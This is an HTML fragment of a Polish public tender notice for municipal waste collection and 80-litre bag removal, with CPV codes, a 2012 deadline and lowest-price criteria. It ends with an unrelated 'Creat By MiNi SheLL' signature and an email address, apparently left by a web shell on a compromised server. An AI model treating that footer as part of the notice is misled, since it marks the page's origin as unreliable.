Częstotliwość  realizacji usługi: obowiązkowo 1 raz w miesiącu najpóźniej do 5 dnia każdego miesiąca. Zamawiający może zgłosić konieczność wywozu w formie dodatkowego zgłoszenia, który należy zrealizować w ciągu 24 godzin od chwili zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wywóz odpadów komunalnych we workach 80 litrowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wywóz odpadów komunalnych w workach foliowych 80 litrowych na każdorazowe zgłoszenie Zamawiającego w sytuacji, gdy zajdzie potrzeba. Przewiduje się wywóz minimum 60 worków, z tym że Zamawiający zastrzega sobie możliwość zmiany zakresu, lecz nie mniej niż 20 %.
Do obowiązków wykonawcy należeć będzie: odbiór worków 80 litrowych z odpadami, wywóz odpadów na wysypisko śmieci

Częstotliwość realizacji usługi: na każdorazowe zgłoszenie telefoniczne Zamawiającego w ciągu 24 godzin od chwili zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com